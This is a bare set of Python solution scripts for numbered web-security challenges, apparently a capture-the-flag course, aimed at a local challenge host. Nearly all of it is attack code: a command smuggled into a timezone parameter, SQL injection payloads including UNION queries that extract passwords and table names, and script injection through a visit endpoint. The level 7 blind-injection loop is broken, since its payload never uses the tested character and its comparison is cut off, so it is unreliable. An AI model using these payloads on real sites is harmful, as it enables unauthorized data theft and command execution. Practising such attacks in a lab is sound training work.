Web Security
level 1
import requests
response = requests.get("http://challenge.localhost?path=/flag")
print(response.text)
level 2
import requests
response = requests.get("http://challenge.localhost/?timezone=MST date")
print(response.text)
level 3
import requests
response = requests.get("http://challenge.localhost/?user=1")
print(response.text)
level 4
import requests
data={
"username": 'flag" --',
"password": 'flag'
}
response = requests.post("http://challenge.localhost/", data = data)
print(response.text)
level 5
import requests
params={
"query": '" UNION SELECT password FROM users --'
}
response = requests.post("http://challenge.localhost/", params = params)
print(response.text)
level 6
import requests
params={
"query": '" UNION SELECT tbl_name FROM sqlite_master --'
}
response = requests.post("http://challenge.localhost/", params = params)
print(response.text)
import requests
params={
"query": '" UNION SELECT password FROM table9110909979364706165 --'
}
response = requests.post("http://challenge.localhost/", params = params)
print(response.text)
level 7
import string
import requests
searchspace = string.ascii_letters + string.digits + '{}._-'
solution = ''
while True:
for char in searchspace:
data = {
"username": f'" OR SUBSTR(username, 1, 1 --',
"password": 'flag'
}
response = requests.post("http://challenge.localhost/", data = data)
if response.text.startswith("Hello"):
solution += char
print(solution)
break
level 8
import requests
response = requests.get("http://challenge.localhost/visit?url=http://challenge.localhost/echo?echo=<script>alert(1)</script>")
print(response.text)
level 9
import requests
response = requests.get("http://challenge.localhost/visit?url=http://challenge.localhost/echo?echo=</textarea><script>alert(1)</script><textarea>")
print(response.text)
level 10
import requests
params = {
"url": "http://challenge.localhost/leak"
}
response = requests.get("http://challenge.localhost/visit", params = params)
print(response.text)
import requests
params = {
"user": 1
}
response = requests.get("http://challenge.localhost/info", params = params)
print(response.text)
level 11
import requests
params = {
"url": "http://challenge.localhost/leak"
}
response = requests.get("http://challenge.localhost/visit", params = params)
print(response.text)
import requests
params = {
"user": 1
}
response = requests.get("http://challenge.localhost/info", params = params)
print(response.text)
Last updated